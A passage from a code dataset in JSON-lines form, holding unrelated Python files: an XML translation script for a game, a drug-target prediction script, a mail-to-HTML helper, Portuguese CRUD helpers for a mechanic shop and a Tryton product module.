字出现次数\n\nprint(len(wc)) # 印出字典长度\nprint(wc['Allen']) #查找字典中是否有包含allen的字\n\nwhile True:\n\tword = input('请问你想查什么字: ')\n\tif word == 'q':\n\t\tbreak\n\tif word in wc:\n\t\tprint( word, '出现过的次数为: ', wc[word])\n\telse:\n\t\tprint('这个字没出现过欧~')\n\t\nprint('感谢使用本查询功能')\n\n","repo_name":"DoraSQL/reviews-analytics","sub_path":"filter2.py","file_name":"filter2.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"467815212","text":"# -*- coding: utf-8 -*-\n\nimport hashlib\nimport time\nfrom xml.dom.minidom import parse\n\nimport aliyun\nimport 代理api\n\n\ndef saveip():\n return 代理api.getip()\n\n\nglobal ip\nip = saveip()\n\n\ndef encrypt(signStr):\n hash_algorithm = hashlib.sha256()\n hash_algorithm.update(signStr.encode('utf-8'))\n return hash_algorithm.hexdigest()\n\n\ndef truncate(q):\n if q is None:\n return None\n size = len(q)\n return q if size <= 20 else q[0:10] + str(size) + q[size - 10:size]\n\n\ndef xmlGetAndUpdate(name):\n global ip\n domTree = parse(name)\n # 文档根元素\n rootNode = domTree.documentElement\n print(rootNode.nodeName)\n aaa = 0\n bbb = True\n # 所有list\n lists = rootNode.getElementsByTagName(\"Body\")[0].getElementsByTagName(\"listElem\")\n print(\"****所有信息****\")\n for list in lists:\n if list.hasAttribute(\"id\"):\n\n # if int(list.getAttribute(\"id\"))<8934:\n # continue\n # translation 元素\n translation = list.getElementsByTagName(\"translation\")[0]\n original = list.getElementsByTagName(\"original\")[0]\n if not translation.childNodes:\n print(\"id:\", list.getAttribute(\"id\"))\n continue\n if translation.childNodes[0].data != original.childNodes[0].data:\n continue\n\n print(\"id:\", list.getAttribute(\"id\"))\n print(translation.nodeName, \":\", translation.childNodes[0].data)\n if translation.childNodes[0].data == \"\\FFFF\\\\\":\n continue\n if translation.childNodes[0].data == \"--\\F801\\\\\\\\FFFF\\\\\":\n continue\n\n chuli1 = str(translation.childNodes[0].data)\n chuli = \"\"\n tran = \"\"\n for i in chuli1:\n if i == \"\\\\\":\n if chuli != \"\":\n # time.sleep(0.04)\n # tran = tran + connect(chuli, random.randint(0, 9))\n # tran = tran + connect(chuli, aaa%10)\n # tran = tran + connect1(chuli)\n args = {\n 'format_type': 'text',\n 'source_language': 'ja',\n 'target_language': 'zh',\n 'source_text': chuli,\n 'scene': 'general'\n }\n if chuli == '!':\n tran = tran + \"!\"\n else:\n tran = tran + aliyun.Sample.main(args)\n tran = tran + i\n if bbb:\n bbb = False\n else:\n bbb = True\n continue\n if bbb:\n chuli = chuli + i\n else:\n chuli = \"\"\n tran = tran + i\n print(tran)\n print(\"等待0.2s\")\n time.sleep(0.2)\n translation.childNodes[0].data = tran\n if aaa > 10:\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n aaa = 0\n else:\n aaa = aaa + 1\n\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n\n\ndef xmlGetAndUpdate2(name):\n global ip\n domTree = parse(name)\n # 文档根元素\n rootNode = domTree.documentElement\n print(rootNode.nodeName)\n aaa = 0\n bbb = True\n # 所有list\n lists = rootNode.getElementsByTagName(\"body\")[0].getElementsByTagName(\"id\")\n print(\"****所有信息****\")\n for list in lists:\n\n # if int(list.getAttribute(\"id\"))<8934:\n # continue\n # translation 元素\n translation = list.getElementsByTagName(\"translate\")[0]\n original = list.getElementsByTagName(\"origin\")[0].childNodes[0].data\n if translation.childNodes[0].data != original:\n continue\n if translation.childNodes[0].data == \"NONE\":\n continue\n\n chuli1 = str(translation.childNodes[0].data)\n tran = \"\"\n\n args = {\n 'format_type': 'text',\n 'source_language': 'ja',\n 'target_language': 'zh',\n 'source_text': chuli1,\n 'scene': 'general'\n }\n tran= aliyun.Sample.main(args)\n print(tran)\n print(\"等待0.1s\")\n time.sleep(0.1)\n translation.childNodes[0].data = tran\n if aaa > 10:\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n aaa = 0\n else:\n aaa = aaa + 1\n\n with open(name, 'w', encoding='UTF-8') as f:\n # 缩进 - 换行 - 编码\n domTree.writexml(f, encoding='UTF-8')\n f.close()\n\n\n# if __name__ == '__main__':\n# # xmlGetAndUpdate(\"HPI/DICTIONARYREPORT/DICREPORTITEMMSG.xml\")\n# # print(\"OK\")\n# with open(\"xml.txt\", \"r\", encoding='UTF-8') as f:\n# for line in f.readlines():\n# line = line.strip('\\n') # 去掉列表中每一个元素的换行符\n# xmlGetAndUpdate(line)\n# print(\"完成\", line)\n# print(\"全部翻译完成\\n哈哈哈哈哈哈哈\")\nif __name__ == '__main__':\n with open(\"tblxml.txt\", \"r\", encoding='GBK') as f:\n for line in f.readlines():\n line = line.strip('\\n') # 去掉列表中每一个元素的换行符\n xmlGetAndUpdate2(line)\n print(\"完成\", line)\n print(\"全部翻译完成\\n哈哈哈哈哈哈哈\")\n","repo_name":"yulan233/Etrian_OdysseyX-Translate","sub_path":"feiqi/网易有道api.py","file_name":"网易有道api.py","file_ext":"py","file_size_in_byte":5898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"71977567047","text":"import numpy as np\nimport pandas as pd\nfrom keras.preprocessing import sequence\nimport keras\nfrom keras import backend as K\nfrom keras.models import load_model\nimport argparse\nimport h5py\n\nseq_rdic = ['A','I','L','V','F','W','Y','N','C','Q','M','S','T','D','E','R','H','K','G','P','O','U','X','B','Z']\nseq_dic = {w: i+1 for i,w in enumerate(seq_rdic)}\n\n\ndef encodeSeq(seq, seq_dic):\n if pd.isnull(seq):\n return [0] \n else:\n return [seq_dic[aa] for aa in seq]\n\ndef encodeSeq(seq, seq_dic):\n if pd.isnull(seq):\n return [0]\n else:\n return [seq_dic[aa] for aa in seq]\n\ndef parse_data(dti_dir, drug_dir, protein_dir, with_label=True,\n prot_len=2500, prot_vec=\"Convolution\",\n drug_vec=\"Convolution\", drug_len=2048):\n\n print(\"Parsing {0} , {1}, {2} with length {3}, type {4}\".format(*[dti_dir ,drug_dir, protein_dir, prot_len, prot_vec]))\n\n protein_col = \"Protein_ID\"\n drug_col = \"Compound_ID\"\n col_names = [protein_col, drug_col]\n if with_label:\n label_col = \"Label\"\n col_names += [label_col]\n dti_df = pd.read_csv(dti_dir)\n drug_df = pd.read_csv(drug_dir, index_col=\"Compound_ID\")\n protein_df = pd.read_csv(protein_dir, index_col=\"Protein_ID\")\n\n\n if prot_vec == \"Convolution\":\n protein_df[\"encoded_sequence\"] = protein_df.Sequence.map(lambda a: encodeSeq(a, seq_dic))\n dti_df = pd.merge(dti_df, protein_df, left_on=protein_col, right_index=True)\n dti_df = pd.merge(dti_df, drug_df, left_on=drug_col, right_index=True)\n drug_feature = np.stack(dti_df[drug_vec].map(lambda fp: fp.split(\"\\t\")))\n if prot_vec==\"Convolution\":\n protein_feature = sequence.pad_sequences(dti_df[\"encoded_sequence\"].values, prot_len)\n else:\n protein_feature = np.stack(dti_df[prot_vec].map(lambda fp: fp.split(\"\\t\")))\n if with_label:\n label = dti_df[label_col].values\n print(\"\\tPositive data : %d\" %(sum(dti_df[label_col])))\n print(\"\\tNegative data : %d\" %(dti_df.shape[0] - sum(dti_df[label_col])))\n return {\"protein_feature\": protein_feature, \"drug_feature\": drug_feature, \"label\": label,\n \"Compound_ID\":dti_df[\"Compound_ID\"].tolist(), \"Protein_ID\":dti_df[\"Protein_ID\"].tolist()}\n else:\n return {\"protein_feature\": protein_feature, \"drug_feature\": drug_feature,\n \"Compound_ID\":dti_df[\"Compound_ID\"].tolist(), \"Protein_ID\":dti_df[\"Protein_ID\"].tolist()}\n\n\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"model\")\n # test_params\n parser.add_argument(\"--test-name\", '-n', help=\"Name of test data sets\", nargs=\"*\")\n parser.add_argument(\"--test-dti-dir\", \"-i\", help=\"Test dti [drug, target, [label]]\", nargs=\"*\")\n parser.add_argument(\"--test-drug-dir\", \"-d\", help=\"Test drug information [drug, SMILES,[feature_name, ..]]\", nargs=\"*\")\n parser.add_argument(\"--test-protein-dir\", '-t', help=\"Test Protein information [protein, seq, [feature_name]]\", nargs=\"*\")\n parser.add_argument(\"--with-label\", \"-W\", help=\"Existence of label information in test DTI\", action=\"store_true\", default=False)\n parser.add_argument(\"--output\", \"-o\", help=\"Prediction output\", type=str)\n parser.add_argument(\"--prot-vec\", \"-v\", help=\"Type of protein feature, if Convolution, it will execute conlvolution on sequeunce\", type=str, default=\"Convolution\")\n parser.add_argument(\"--prot-len\", \"-l\", help=\"Protein vector length\", default=2500, type=int)\n parser.add_argument(\"--drug-vec\", \"-V\", help=\"Type of drug feature\", type=str, default=\"morgan_fp\")\n parser.add_argument(\"--drug-len\", \"-L\", help=\"Drug vector length\", default=2048, type=int)\n args = parser.parse_args()\n \n model = args.model\n\n test_names = args.test_name\n tests = args.test_dti_dir\n test_proteins = args.test_protein_dir\n test_drugs = args.test_drug_dir\n test_sets = zip(test_names, tests, test_drugs, test_proteins)\n with_label = args.with_label\n output_file = args.output\n\n\n f = h5py.File(model, 'r+')\n\n try:\n f.__delitem__(\"optimizer_weights\")\n except:\n print(\"optimizer_weights are already deleted\")\n\n f.close()\n\n type_params = {\n \"prot_vec\": args.prot_vec,\n \"prot_len\": args.prot_len,\n \"drug_vec\": args.drug_vec,\n \"drug_len\": args.drug_len,\n }\n test_dic = {test_name: parse_data(test_dti, test_drug, test_protein, with_label=with_label, **type_params)\n for test_name, test_dti, test_drug, test_protein in test_sets}\n\n loaded_model = load_model(model)\n print(\"prediction\")\n result_df = pd.DataFrame()\n result_columns = []\n for dataset in test_dic:\n temp_df = pd.DataFrame()\n prediction_dic = test_dic[dataset]\n N = int(np.ceil(prediction_dic[\"drug_feature\"].shape[0]/50))\n d_splitted = np.array_split(prediction_dic[\"drug_feature\"], N)\n p_splitted = np.array_split(prediction_dic[\"protein_feature\"], N)\n predicted = sum([np.squeeze(loaded_model.predict([d,p])).tolist() for d,p in zip(d_splitted, p_splitted)], [])\n temp_df[dataset, 'predicted'] = predicted\n temp_df[dataset, 'Compound_ID'] = prediction_dic[\"Compound_ID\"]\n temp_df[dataset, 'Protein_ID'] = prediction_dic[\"Protein_ID\"]\n if with_label:\n temp_df[dataset, 'label'] = np.squeeze(test_dic[dataset]['label'])\n result_df = pd.concat([result_df, temp_df], ignore_index=True, axis=1)\n result_columns.append((dataset, \"predicted\"))\n result_columns.append((dataset, \"Compound_ID\"))\n result_columns.append((dataset, \"Protein_ID\"))\n if with_label:\n result_columns.append((dataset, \"label\"))\n result_df.columns = pd.MultiIndex.from_tuples(result_columns)\n print(\"save to %s\"%output_file)\n result_df.to_csv(output_file, index=False)\n '''\n predicted = loaded_model.predict([prediction_dic[\"drug_feature\"],prediction_dic[\"protein_feature\"]])\n dti_dic = prediction_dic['dti']\n dti_dic[\"predicted\"] = predicted\n dti_dic.to_csv(output)\n '''\n","repo_name":"GIST-CSBL/DeepConv-DTI","sub_path":"predict_with_model.py","file_name":"predict_with_model.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"16"} +{"seq_id":"36267230983","text":"\"\"\"\nChecks raw dataset volume\n\"\"\"\n\nimport os\nimport unittest\nfrom constants import ASSETS_PATH\n\n\nclass VolumeCHeckTest(unittest.TestCase):\n \"\"\"\n Checks folder volume is appropriate\n \"\"\"\n def test_folder_is_appropriate(self):\n metas, raws = 0, 0\n for file in os.listdir(ASSETS_PATH):\n if file.endswith(\"_raw.txt\"):\n raws += 1\n if file.endswith(\"_meta.json\"):\n metas += 1\n\n self.assertEqual(metas, raws,\n msg=\"\"\"Collected dataset do not contain equal number of raw_articles and metas\"\"\")\n","repo_name":"fipl-hse/2020-2-level-ctlr","sub_path":"config/check_raw_dataset_volume_test.py","file_name":"check_raw_dataset_volume_test.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14248927406","text":"# coding: utf-8\n\ndef Mail2HTML(text, str_list):\n html = \"\"\n colors = [\"#0070C0\", \"#FF0000\", \"#548235\", \"#7030A0\", \"#7F6000\"]\n\n d = str_list.pop(0)\n while text != \"\":\n if(text.startswith(d[\"text\"])):\n if(d[\"type\"] != 5):\n html += '' + d[\"text\"] + ''\n else:\n html += d[\"text\"]\n text = text[len(d[\"text\"]):]\n if(str_list != []):\n d = str_list.pop(0)\n else:\n d = {\"text\":\"\", \"type\":-1 }\n else:\n if text[0] == \"\\n\":\n html += \"
\"\n else:\n html += text[0]\n text = text[1:]\n\n return html\n\n\"\"\"mailText = \"株式会社jack\\n\\\n坂田悠馬様\\n\\\n\\n\\\nいつもお世話になっております。\\n\\\n株式会社NU Creatersの小林です。\\n\\\n\\n\\\n先日ご依頼いただきました商品Aのお見積りが\\n\\\nご用意できましたので、お知らせ申し上げます。\\n\\\n\\n\\\nぜひ直接ご説明させていただきたいと思いますので、\\n\\\n名古屋大学付属図書館に、5月21日(火)の10時からお打ち合わせできますでしょうか。\\n\\\n\\n\\\n住所は、名古屋市千種区不老町です。\\n\\\n\\n\\\n坂田様のご都合をお聞かせいただければ幸いです。\\n\\\n\\n\\\nお忙しいところ申し訳ありませんが、\\n\\\nどうぞよろしくお願いいたします。\\\n\"\n\n_str_List = [[\"株式会社jack\", 0],[\"坂田悠馬\",1],[\"いつもお世話になっております。\",5],\n[\"株式会社NU Creaters\",0],[\"の\",5],[\"小林\",1],[\"です。\",5],\n[\"先日ご依頼いただきました商品Aのお見積りが\",5],[\"ご用意できましたので、お知らせ申し上げます。\",5],\n[\"ぜひ直接ご説明させていただきたいと思いますので、\",5],[\"名古屋大学付属図書館\",2],[\"に、\",5],\n[\"5月21日(火)\",3],[\"の\",5],[\"10時\",3],[\"からお打ち合わせできますでしょうか。\",5],\n[\"住所は、\",5],[\"名古屋市千種区不老町\",4],[\"です。\",5],[\"坂田様のご都合をお聞かせいただければ幸いです。\",5],\n[\"お忙しいところ申し訳ありませんが、\",5],[\"どうぞよろしくお願いいたします。\",5]]\n_str_list = list(map(lambda x:{\"text\":x[0],\"type\":x[1]}, _str_List))\n\nprint(Mail2HTML(mailText, _str_list))\n\"\"\"\n","repo_name":"ayahito-saji/MailColoringProto","sub_path":"api/toHTML.py","file_name":"toHTML.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8088832695","text":"# funções e modelos\n\ndef linha(tam=50):\n return '-' * tam\n\ndef cabecalho(msg):\n print(linha())\n print(f'\\033[1;93m{msg.center(50)}\\033[m') # alinha a mensagem no meio de 42 caracteres\n print(linha())\n\ndef menu(lista):\n cont = 1\n for item in lista:\n print(f'\\033[1;92m[ {cont} ]\\033[m - \\033[1;93m{item}\\033[m')\n cont += 1\n print(linha())\n while True:\n try:\n n = int(input('\\033[1;37mSelecionar Opção:\\033[m '))\n n = abs(n)\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n opcao = n\n return opcao\n\ndef validanome():\n while True:\n try:\n nome = str(input('Nome: ')).strip()\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n return nome\n\ndef validaidade():\n while True:\n try:\n idade = int(input('Idade: '))\n idade = abs(idade)\n except (ValueError, TypeError):\n print('\\033[1;31mERRO! Digite uma opção válida.\\033[m')\n except KeyboardInterrupt:\n print(\n '\\033[1;31mEntrada de dados interrompida pelo usuário.\\033[m')\n else:\n break\n return idade\n\ndef leiaInt(msg):\n o = False\n valor = 0\n while True:\n n = str(input(msg))\n if n.isnumeric():\n valor = int(n)\n o = True\n else:\n print(\"\\033[0;31mDigite um numero inteiro valido\\033[m\")\n if o:\n break\n return valor\n\ndef escreverNovoFuncionario(lista_Funcionario):\n func = lista_Funcionario[0] + \", \" + lista_Funcionario[1] + \", \" + lista_Funcionario[2] + \", \" + lista_Funcionario[3] + \"\\n\"\n arquivo = open('funcionarios.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarFuncionario(numero, lista_usuarios):\n limite = len(lista_usuarios) #variavel limite vai reeber a quantidade exata de elementos na lista.\n if numero > limite:\n print(\"Não existe essa opção.\")\n elif numero == 0 or numero == 1 or numero == 2 or numero == 3:\n print('\\033[1;31mERRO! Usuário não removível.\\033[m')\n else:\n lista_usuarios.pop(numero - 1) #removendo o elemento no indice exato\n del lista_usuarios[0:3] #removendo os itens dos indices 0,1,2.\n with open('funcionarios.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_usuarios: #reescrevendo no arquivo .txt usuarios(fora os padrões)\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n #atualizarLista(user) lembrar de atualizar a variavel listaUsuarios após chamar essa função\n\ndef escreverNovoCliente(lista_Cliente):\n func = lista_Cliente[0] + \", \" + lista_Cliente[1] + \", \" + lista_Cliente[2] + \", \" + lista_Cliente[3] + \", \" + lista_Cliente[4] + \", \" + lista_Cliente[5] + \"\\n\"\n arquivo = open('clientes.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarCliente(numero, lista_clientes):\n limite = len(lista_clientes)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_clientes.pop(numero-1)\n #print(lista_clientes)\n with open('clientes.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_clientes:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \", \" + item[4] + \", \" + item[5] + \"\\n\"\n arquivo.write(func)\n #atualizarClientes()\n\ndef escreverNovoOrcamento(lista_Orcamento):\n func = lista_Orcamento[0] + \", \" + lista_Orcamento[1] + \", \" + lista_Orcamento[2] + \", \" + lista_Orcamento[3] + \"\\n\"\n arquivo = open('orcamentos.txt', 'a', encoding=\"utf8\")\n arquivo.write(func)\n arquivo.close()\n\ndef escreverNovaOrdem(item):\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \" - :::::PENDENTE:::::\\n\"\n arquivo = open('ordens.txt', 'a', encoding=\"utf8\")\n arquivo.writelines(func)\n arquivo.close()\n\ndef deletarOrdem(numero, lista_ordens):\n limite = len(lista_ordens)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_ordens.pop(numero-1)\n #print(lista_ordens)\n with open('ordens.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_ordens:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n\ndef escreverOrdemConcluida(item):\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \" PARA :::::CONCLUÍDA!!!:::::\\n\"\n arquivo = open('ordens.txt', 'w', encoding=\"utf8\")\n arquivo.write(func)\n arquivo.close()\n\ndef deletarOrcamento(numero, lista_orcamentos):\n limite = len(lista_orcamentos)\n if numero > limite:\n print(\"Não existe essa opção.\")\n else:\n lista_orcamentos.pop(numero)\n with open('orcamentos.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_orcamentos:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n\ndef editarFuncionario(numero,lista_Usuarios):\n limite = len(lista_Usuarios)\n if numero > limite:\n print(\"Não existe essa opção.\")\n elif numero == 0 or numero == 1 or numero == 2 or numero == 3:\n print('\\033[1;31mERRO! Usuário não editável.\\033[m')\n else:\n del lista_Usuarios[0:3]\n print(lista_Usuarios[numero-4])\n lista_Usuarios.pop(numero - 4)\n edicao =[]\n nome = input(\"Editar nome funcionário:\\n\")\n edicao.append(nome)\n senha = input(\"\\nEditar nova senha do funcionário:\\n\")\n edicao.append(senha)\n print(\"Selecione o cargo do funcionario:\")\n cargo = menu(\n [\"admin\", \"recepcionista\", \"mecanico\"])\n cargo = str(cargo)\n edicao.append(cargo)\n cPf = input(\"\\nEditar CPF do funcionário:\\n\")\n edicao.append(cPf)\n lista_Usuarios.insert(numero-4, edicao)\n with open('funcionarios.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_Usuarios:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \"\\n\"\n arquivo.write(func)\n #aualizarLista(user1)\n\ndef editarClientes(numero,lista_Clientes):\n limite = len(lista_Clientes)\n if numero > limite or numero == 0:\n print(\"Não existe essa opção.\")\n else:\n print(lista_Clientes[numero-1])\n lista_Clientes.pop(numero - 1)\n\n edicao =[]\n nome = input(\"Digite nome cliente:\\n\")\n edicao.append(nome)\n cPf = input(\"\\nDigite CPF do cliente:\\n\")\n edicao.append(cPf)\n email = input(\"\\nDigite email do cliente:\\n\")\n edicao.append(email)\n telefone = input(\"\\nDigite o telefone do cliente:\\n\")\n edicao.append(telefone)\n endereco = input(\"\\nDigite o endereço do cliente:\\n\")\n edicao.append(endereco)\n placa = input(\"\\ndigite a placa do carro:\\n\")\n edicao.append(placa)\n print(\"\\nSelecione o cargo do funcionario:\\n\")\n\n lista_Clientes.insert(numero-1, edicao)\n with open('clientes.txt', 'w', encoding=\"utf8\") as arquivo:\n for item in lista_Clientes:\n func = item[0] + \", \" + item[1] + \", \" + item[2] + \", \" + item[3] + \", \" + item[4] + \", \" + item[5] + \"\\n\"\n arquivo.write(func)\n #atualizarClientes()","repo_name":"Igorpereirag/Projetofinal_logica-de-programa-o","sub_path":"lib/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7892,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73208668168","text":"from datetime import date\nfrom dateutil.relativedelta import relativedelta\n\nfrom trytond.transaction import Transaction\nfrom trytond.pool import PoolMeta, Pool\nfrom trytond.model import fields\nfrom trytond.pyson import Bool, Eval\nfrom nereid import request, cache, jsonify, abort, current_user, route\nfrom nereid.helpers import key_from_list\n\n__all__ = ['Product']\n__metaclass__ = PoolMeta\n\n\nclass Product:\n \"Product extension for Nereid\"\n __name__ = \"product.product\"\n\n display_available_quantity = fields.Boolean(\n \"Display Available Quantity On Website?\"\n )\n\n start_displaying_qty_digits = fields.Function(\n fields.Integer('Start Quantity Digits'),\n getter='on_change_with_start_displaying_qty_digits'\n )\n\n start_displaying_available_quantity = fields.Numeric(\n 'Start Quantity', digits=(16, Eval('start_displaying_qty_digits', 2)),\n states={\n 'invisible': ~Bool(Eval('display_available_quantity')),\n }, depends=[\n 'display_available_quantity', 'start_displaying_qty_digits',\n ],\n help=(\n \"Product's available quantity must be less than this to show on\"\n \" website\"\n )\n )\n\n min_warehouse_quantity = fields.Numeric(\n 'Min Warehouse Quantity', digits=(16, 4),\n help=\"Minimum quantity required in warehouse for orders\"\n )\n is_backorder = fields.Function(\n fields.Boolean(\"Is Backorder\"), getter=\"get_is_backorder\"\n )\n\n def get_is_backorder(self, name):\n if self.min_warehouse_quantity is None or \\\n self.min_warehouse_quantity < 0:\n return True\n return False\n\n @classmethod\n def __setup__(cls):\n super(Product, cls).__setup__()\n\n cls._error_messages.update({\n 'start_displaying_positive': (\n 'This quantity should be always be positive'\n ),\n })\n\n @classmethod\n def validate(cls, records):\n \"\"\"\n Validation method\n \"\"\"\n super(Product, cls).validate(records)\n\n for record in records:\n record.validate_start_display_quantity()\n\n def validate_start_display_quantity(self):\n \"\"\"\n This method validates that `start_displaying_available_quantity` is\n always positive.\n \"\"\"\n if self.start_displaying_available_quantity and \\\n self.start_displaying_available_quantity <= 0:\n self.raise_user_error('start_displaying_positive')\n\n @staticmethod\n def default_min_warehouse_quantity():\n \"\"\"\n By default, min_warehouse_quantity is minus one. This is to handle the\n normal sale order workflow.\n \"\"\"\n return -1\n\n @fields.depends('_parent_template')\n def on_change_with_start_displaying_qty_digits(self, name=None):\n \"\"\"\n Getter for start_displaying_qty_digits\n \"\"\"\n return self.template.default_uom.digits or 2\n\n def can_buy_from_eshop(self):\n \"\"\"\n This function is used for inventory checking purpose. It returns a\n boolean result on the basis of fields such as min_warehouse_quantity.\n \"\"\"\n quantity = self.get_availability().get('quantity')\n\n if self.type != 'goods':\n # If product type is not goods, then inventory need not be checked\n return True\n\n if self.min_warehouse_quantity < 0 or \\\n self.min_warehouse_quantity is None:\n # If min_warehouse_quantity is negative (back order) or not set,\n # product is in stock\n return True\n elif quantity > self.min_warehouse_quantity:\n # If min_warehouse_quantity is less than available quantity, product\n # is in stock\n return True\n else:\n # In all other cases, product is not in stock\n return False\n\n def inventory_status(self):\n \"\"\"\n This method returns the inventory status for the given product which can\n have the following messages -:\n * Out Of Stock\n * In Stock\n * X left\n\n It returns a tuple of the form -:\n ('in_stock', 'In Stock')\n whose elements are decided by the fields min_warehouse_quantity,\n start_displaying_available_quantity and the product's current quantity.\n\n The first element of the tuple can be used in future to decide things\n such as color scheming in template. The second element of the tuple is\n the message to show.\n \"\"\"\n if self.can_buy_from_eshop():\n status, message = 'in_stock', 'In stock'\n else:\n status, message = 'out_of_stock', 'Out of stock'\n\n quantity = self.get_availability().get('quantity')\n\n if status == 'in_stock' and self.display_available_quantity and \\\n quantity <= self.start_displaying_available_quantity:\n message = '%s %s left' % (quantity, self.default_uom.name)\n\n return status, message\n\n def serialize(self, purpose=None):\n \"\"\"\n Serialize product data\n \"\"\"\n if purpose == 'cart':\n return {\n 'id': self.id,\n 'code': self.code,\n 'name': self.name,\n 'category': self.category and self.category.name or None,\n 'image': (self.default_image.transform_command().thumbnail(\n 150, 150, 'a'\n ).url() if self.default_image else None),\n }\n if hasattr(super(Product, self), 'serialize'):\n return super(Product, self).serialize(purpose)\n\n def sale_price(self, quantity=0):\n \"\"\"Return the Sales Price.\n A wrapper designed to work as a context variable in templating\n\n The price is calculated from the pricelist associated with the current\n user. The user in the case of guest user is logged in user. In the\n event that the logged in user does not have a pricelist set against\n the user, the guest user's pricelist is chosen.\n\n Finally if neither the guest user, nor the regsitered user has a\n pricelist set against them then the list price is displayed as the\n list price of the product\n\n :param quantity: Quantity\n \"\"\"\n Sale = Pool().get('sale.sale')\n\n price_list = Sale.default_price_list()\n\n if current_user.is_anonymous():\n customer = request.nereid_website.guest_user.party\n else:\n customer = current_user.party\n\n # Build a Cache key to store in cache\n cache_key = key_from_list([\n Transaction().cursor.dbname,\n Transaction().user,\n customer.id,\n price_list, self.id, quantity,\n request.nereid_currency.id,\n 'product.product.sale_price',\n ])\n price = cache.get(cache_key)\n if price is None:\n # There is a valid pricelist, now get the price\n with Transaction().set_context(\n customer=customer.id,\n price_list=price_list,\n currency=request.nereid_currency.id\n ):\n price = self.get_sale_price([self], quantity)[self.id]\n\n # Now convert the price to the session currency\n cache.set(cache_key, price, 60 * 5)\n return price\n\n def get_availability(self):\n \"\"\"\n This method could be subclassed to implement your custom availability\n behavior.\n\n By default the forecasted quantity is a 7 day forecast. In future this\n feature may be replaced with a configuration value on the website to\n specify the number of days to forecast.\n\n .. warning::\n `quantity` is mandatory information which needs to be returned, no\n matter what your logic for computing that is\n\n :return: A dictionary with `quantity` and `forecast_quantity`\n \"\"\"\n context = {\n 'locations': [request.nereid_website.stock_location.id],\n 'stock_date_end': date.today() + relativedelta(days=7)\n }\n with Transaction().set_context(**context):\n return {\n 'quantity': self.get_quantity([self], 'quantity')[self.id],\n 'forecast_quantity': self.get_quantity(\n [self], 'forecast_quantity'\n )[self.id],\n }\n\n @classmethod\n @route('/product-availability/')\n def availability(cls, uri):\n \"\"\"\n Returns the following information for a product:\n\n +-------------------+-----------------------------------------------+\n | quantity | Available readily to buy |\n +-------------------+-----------------------------------------------+\n | forecast_quantity | Forecasted quantity, if the site needs it |\n +-------------------+-----------------------------------------------+\n\n .. note::\n To modify the availability, or to send any additional information,\n it is recommended to subclass the :py:meth:`~get_availability` and\n implement your custom logic. For example, you might want to check\n stock with your vendor for back orders or send a message like\n `Only 5 pieces left`\n\n :param uri: URI of the product for which the availability needs to\n be found\n :return: JSON object\n \"\"\"\n try:\n product, = cls.search([\n ('displayed_on_eshop', '=', True),\n ('uri', '=', uri),\n ])\n except ValueError:\n return abort(404)\n\n return jsonify(product.get_availability())\n","repo_name":"openlabs/nereid-cart-b2c","sub_path":"product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":9743,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"20314643473","text":"from os import listdir\nfrom os.path import isfile, join\nimport pickle\nimport os.path\nimport sys\nfrom enxParser import *\n\nif os.path.dirname(__file__) == \"/usr/share/isonav\":\n DATA_PATH = \"/usr/share/isonav/data1p4p5\"\n# elif os.path.dirname(__file__) == \".\":\nelse:\n # fileName=os.path.dirname(__file__)\n DATA_PATH =\"./data1p4p5\"\n print(\"#You do not have a working installation of isonav\")\n print(\"#See the installation procedure in the README file\")\n # sys.exit(1)\n\nisoDictLoc=os.path.join(DATA_PATH, \"isoDict.pkl\")\nisoMassesLoc=os.path.join(DATA_PATH, 